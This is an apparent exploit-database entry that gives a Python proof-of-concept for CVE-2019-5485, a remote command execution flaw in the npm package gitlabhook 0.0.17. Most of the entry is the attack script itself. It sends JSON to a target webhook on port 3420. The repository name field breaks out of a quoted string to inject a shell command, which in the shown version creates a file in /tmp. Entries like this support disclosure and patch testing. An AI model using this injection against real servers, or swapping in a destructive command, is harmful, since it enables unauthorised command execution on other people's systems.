NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution

Author: Semen Alexandrovich Lyhin
type: webapps
platform: json
port: 
date_added: 2019-09-25  
date_updated: 2019-09-25  
verified: 0  
codes: CVE-2019-5485  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 47420.txt  

# Exploit Title: NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution
# Date: 2019-09-13
# Exploit Author: Semen Alexandrovich Lyhin
# Vendor Homepage: https://www.npmjs.com/package/gitlabhook
# Version: 0.0.17
# Tested on: Kali Linux 2, Windows 10.
# CVE : CVE-2019-5485

#!/usr/bin/python

import requests

target = "http://TARGET:3420"
cmd = r"touch /tmp/poc.txt"
json = '{"repository":{"name": "Diasporrra\'; %s;\'"}}'% cmd
r = requests.post(target, json)

print "Done."